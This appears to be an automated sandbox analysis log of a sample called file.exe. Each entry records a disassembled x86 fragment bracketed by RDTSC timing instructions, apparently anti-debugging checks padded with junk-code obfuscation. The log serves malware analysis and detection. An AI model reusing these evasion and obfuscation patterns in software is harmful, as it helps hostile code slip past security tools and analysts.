Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A767A1 second address: A767A5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A767A5 second address: A767B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FAAAC4EC6A6h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A767B3 second address: A767BF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 push ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7687B second address: A7687F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7687F second address: A76889 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A769A2 second address: A769A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76AD1 second address: A76AD5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A76D69 second address: A76D79 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jbe 00007FAAAC4EC6A6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A772E5 second address: A77306 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB36h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77306 second address: A7731F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7731F second address: A7736F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebx 0x00000009 push 00000000h 0x0000000b push edx 0x0000000c call 00007FAAAC4EBB28h 0x00000011 pop edx 0x00000012 mov dword ptr [esp+04h], edx 0x00000016 add dword ptr [esp+04h], 00000017h 0x0000001e inc edx 0x0000001f push edx 0x00000020 ret 0x00000021 pop edx 0x00000022 ret 0x00000023 or dword ptr [ebp+122D1889h], edi 0x00000029 sub dword ptr [ebp+122D1857h], ebx 0x0000002f nop 0x00000030 jp 00007FAAAC4EBB34h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c popad 0x0000003d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7736F second address: A77375 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77375 second address: A7737B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7737B second address: A7737F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7741C second address: A77420 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A77420 second address: A77424 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7770D second address: A7771B instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7771B second address: A7771F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7771F second address: A77725 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A788A9 second address: A788AF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A788AF second address: A788B3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A786FF second address: A78703 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A78703 second address: A78709 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A799A3 second address: A799A7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7A359 second address: A7A38B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FAAAC4EBB26h 0x0000000a popad 0x0000000b jnl 00007FAAAC4EBB2Ch 0x00000011 popad 0x00000012 push eax 0x00000013 push edi 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007FAAAC4EBB36h 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7A38B second address: A7A38F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7A38F second address: A7A431 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push ecx 0x0000000b call 00007FAAAC4EBB28h 0x00000010 pop ecx 0x00000011 mov dword ptr [esp+04h], ecx 0x00000015 add dword ptr [esp+04h], 00000019h 0x0000001d inc ecx 0x0000001e push ecx 0x0000001f ret 0x00000020 pop ecx 0x00000021 ret 0x00000022 mov si, bx 0x00000025 mov edi, dword ptr [ebp+122D2A8Dh] 0x0000002b push 00000000h 0x0000002d add dword ptr [ebp+122D341Bh], ebx 0x00000033 push 00000000h 0x00000035 push 00000000h 0x00000037 push ebx 0x00000038 call 00007FAAAC4EBB28h 0x0000003d pop ebx 0x0000003e mov dword ptr [esp+04h], ebx 0x00000042 add dword ptr [esp+04h], 00000017h 0x0000004a inc ebx 0x0000004b push ebx 0x0000004c ret 0x0000004d pop ebx 0x0000004e ret 0x0000004f sub dword ptr [ebp+1247845Ch], edx 0x00000055 xchg eax, ebx 0x00000056 pushad 0x00000057 jmp 00007FAAAC4EBB31h 0x0000005c jmp 00007FAAAC4EBB37h 0x00000061 popad 0x00000062 push eax 0x00000063 push eax 0x00000064 push edx 0x00000065 jp 00007FAAAC4EBB33h 0x0000006b rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7BA35 second address: A7BA39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C536 second address: A7C53A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C53A second address: A7C5BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FAAAC4EC6A8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000017h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 call 00007FAAAC4EC6ADh 0x0000002b sub dword ptr [ebp+122D1B7Ch], eax 0x00000031 pop edi 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push edx 0x00000037 call 00007FAAAC4EC6A8h 0x0000003c pop edx 0x0000003d mov dword ptr [esp+04h], edx 0x00000041 add dword ptr [esp+04h], 0000001Bh 0x00000049 inc edx 0x0000004a push edx 0x0000004b ret 0x0000004c pop edx 0x0000004d ret 0x0000004e call 00007FAAAC4EC6ADh 0x00000053 movzx esi, di 0x00000056 pop esi 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a push edi 0x0000005b jbe 00007FAAAC4EC6A6h 0x00000061 pop edi 0x00000062 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7C5BA second address: A7C5C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D091 second address: A7D09B instructions: 0x00000000 rdtsc 0x00000002 js 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D09B second address: A7D0A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D0A1 second address: A7D0A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A7D0A5 second address: A7D133 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push ebx 0x0000000e call 00007FAAAC4EBB28h 0x00000013 pop ebx 0x00000014 mov dword ptr [esp+04h], ebx 0x00000018 add dword ptr [esp+04h], 0000001Bh 0x00000020 inc ebx 0x00000021 push ebx 0x00000022 ret 0x00000023 pop ebx 0x00000024 ret 0x00000025 js 00007FAAAC4EBB29h 0x0000002b mov di, si 0x0000002e push 00000000h 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FAAAC4EBB28h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 00000015h 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jp 00007FAAAC4EBB27h 0x00000050 push 00000000h 0x00000052 jmp 00007FAAAC4EBB34h 0x00000057 push eax 0x00000058 push eax 0x00000059 push edx 0x0000005a jnp 00007FAAAC4EBB38h 0x00000060 jmp 00007FAAAC4EBB32h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A810C3 second address: A810D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 jno 00007FAAAC4EC6A6h 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82DA2 second address: A82E0E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jo 00007FAAAC4EBB42h 0x0000000d pushad 0x0000000e je 00007FAAAC4EBB26h 0x00000014 jmp 00007FAAAC4EBB34h 0x00000019 popad 0x0000001a nop 0x0000001b mov dword ptr [ebp+1247944Ah], ecx 0x00000021 push 00000000h 0x00000023 mov dword ptr [ebp+122D184Bh], ecx 0x00000029 push 00000000h 0x0000002b push 00000000h 0x0000002d push edx 0x0000002e call 00007FAAAC4EBB28h 0x00000033 pop edx 0x00000034 mov dword ptr [esp+04h], edx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc edx 0x00000041 push edx 0x00000042 ret 0x00000043 pop edx 0x00000044 ret 0x00000045 or edi, 28491E37h 0x0000004b push eax 0x0000004c pushad 0x0000004d jno 00007FAAAC4EBB28h 0x00000053 push eax 0x00000054 push edx 0x00000055 push eax 0x00000056 pop eax 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A811CD second address: A811D1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8213A second address: A82140 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82140 second address: A82144 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A83CFE second address: A83D95 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB38h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FAAAC4EBB28h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ah 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 push 00000000h 0x00000026 pushad 0x00000027 stc 0x00000028 mov dword ptr [ebp+122D188Eh], edx 0x0000002e popad 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push edx 0x00000034 call 00007FAAAC4EBB28h 0x00000039 pop edx 0x0000003a mov dword ptr [esp+04h], edx 0x0000003e add dword ptr [esp+04h], 0000001Dh 0x00000046 inc edx 0x00000047 push edx 0x00000048 ret 0x00000049 pop edx 0x0000004a ret 0x0000004b je 00007FAAAC4EBB32h 0x00000051 ja 00007FAAAC4EBB2Ch 0x00000057 jno 00007FAAAC4EBB29h 0x0000005d xchg eax, esi 0x0000005e push eax 0x0000005f push edx 0x00000060 jnc 00007FAAAC4EBB28h 0x00000066 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82F6F second address: A82F79 instructions: 0x00000000 rdtsc 0x00000002 je 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A82F79 second address: A82F83 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FAAAC4EBB2Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A85EE0 second address: A85EE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88DFF second address: A88E04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A88E04 second address: A88E0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89D82 second address: A89D87 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89D87 second address: A89DDC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov edi, dword ptr [ebp+1245195Ah] 0x0000000e mov di, cx 0x00000011 push 00000000h 0x00000013 pushad 0x00000014 mov ax, si 0x00000017 and ecx, 2658E033h 0x0000001d popad 0x0000001e push 00000000h 0x00000020 push 00000000h 0x00000022 push edi 0x00000023 call 00007FAAAC4EC6A8h 0x00000028 pop edi 0x00000029 mov dword ptr [esp+04h], edi 0x0000002d add dword ptr [esp+04h], 0000001Ah 0x00000035 inc edi 0x00000036 push edi 0x00000037 ret 0x00000038 pop edi 0x00000039 ret 0x0000003a push eax 0x0000003b push eax 0x0000003c push edx 0x0000003d jmp 00007FAAAC4EC6B0h 0x00000042 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A86EA3 second address: A86EC1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FAAAC4EBB39h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A87F98 second address: A8802B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FAAAC4EC6A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop esi 0x0000000b nop 0x0000000c mov ebx, eax 0x0000000e push dword ptr fs:[00000000h] 0x00000015 mov dword ptr fs:[00000000h], esp 0x0000001c push 00000000h 0x0000001e push eax 0x0000001f call 00007FAAAC4EC6A8h 0x00000024 pop eax 0x00000025 mov dword ptr [esp+04h], eax 0x00000029 add dword ptr [esp+04h], 00000016h 0x00000031 inc eax 0x00000032 push eax 0x00000033 ret 0x00000034 pop eax 0x00000035 ret 0x00000036 mov edi, dword ptr [ebp+122D2C55h] 0x0000003c mov eax, dword ptr [ebp+122D111Dh] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FAAAC4EC6A8h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Dh 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c jl 00007FAAAC4EC6ABh 0x00000062 mov ebx, 401E9D58h 0x00000067 mov edi, dword ptr [ebp+122D294Dh] 0x0000006d push FFFFFFFFh 0x0000006f xor di, 9712h 0x00000074 push eax 0x00000075 jnl 00007FAAAC4EC6B4h 0x0000007b pushad 0x0000007c jns 00007FAAAC4EC6A6h 0x00000082 push eax 0x00000083 push edx 0x00000084 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8BE91 second address: A8BEC3 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FAAAC4EBB2Eh 0x00000008 pushad 0x00000009 push edx 0x0000000a pop edx 0x0000000b jmp 00007FAAAC4EBB32h 0x00000010 jmp 00007FAAAC4EBB2Bh 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A2830E second address: A28314 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89F27 second address: A89F2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A89F2D second address: A89F31 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C47D second address: A8C48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C48A second address: A8C490 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C490 second address: A8C495 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8C495 second address: A8C4E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FAAAC4EC6A6h 0x00000009 jne 00007FAAAC4EC6A6h 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 nop 0x00000013 mov dword ptr [ebp+122D1B6Dh], eax 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007FAAAC4EC6A8h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 00000019h 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 mov edi, dword ptr [ebp+122D2E4Fh] 0x0000003b xor ebx, dword ptr [ebp+1244A75Ch] 0x00000041 push 00000000h 0x00000043 push eax 0x00000044 pushad 0x00000045 push ecx 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D644 second address: A8D64D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D83B second address: A8D83F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D83F second address: A8D843 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D843 second address: A8D849 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8D849 second address: A8D84E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F627 second address: A8F62D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8F62D second address: A8F631 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E6EE second address: A8E711 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jp 00007FAAAC4EC6A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E711 second address: A8E729 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FAAAC4EBB2Dh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E729 second address: A8E744 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EC6B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A8E744 second address: A8E7C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FAAAC4EBB31h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a xor dword ptr [ebp+122D2EF2h], edx 0x00000010 push dword ptr fs:[00000000h] 0x00000017 mov ebx, 005E4757h 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 mov edi, 6CAE48E6h 0x00000028 mov ebx, edx 0x0000002a mov eax, dword ptr [ebp+122D0CC9h] 0x00000030 push 00000000h 0x00000032 push esi 0x00000033 call 00007FAAAC4EBB28h 0x00000038 pop esi 0x00000039 mov dword ptr [esp+04h], esi 0x0000003d add dword ptr [esp+04h], 0000001Ah 0x00000045 inc esi 0x00000046 push esi 0x00000047 ret 0x00000048 pop esi 0x00000049 ret 0x0000004a jo 00007FAAAC4EBB2Ch 0x00000050 xor edi, dword ptr [ebp+122D2959h] 0x00000056 mov ebx, 59D9A100h 0x0000005b push FFFFFFFFh 0x0000005d jo 00007FAAAC4EBB27h 0x00000063 cmc 0x00000064 nop 0x00000065 pushad 0x00000066 push eax 0x00000067 push edx 0x00000068 jo 00007FAAAC4EBB26h 0x0000006e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915EC second address: A915F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A915F0 second address: A915F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A94B88 second address: A94B8C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9A6C9 second address: A9A6DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jns 00007FAAAC4EBB26h 0x0000000a jnc 00007FAAAC4EBB26h 0x00000010 popad 0x00000011 push ebx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAAF second address: A9AAB3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAB3 second address: A9AAB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9AAB9 second address: A9AABF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F2CE second address: A9F2D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F2D5 second address: A9F307 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FAAAC4EC6A8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov eax, dword ptr [esp+04h] 0x0000000e jmp 00007FAAAC4EC6B4h 0x00000013 mov eax, dword ptr [eax] 0x00000015 push eax 0x00000016 push edx 0x00000017 pushad 0x00000018 jbe 00007FAAAC4EC6A6h 0x0000001e pushad 0x0000001f popad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: A9F307 second address: A9F30D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
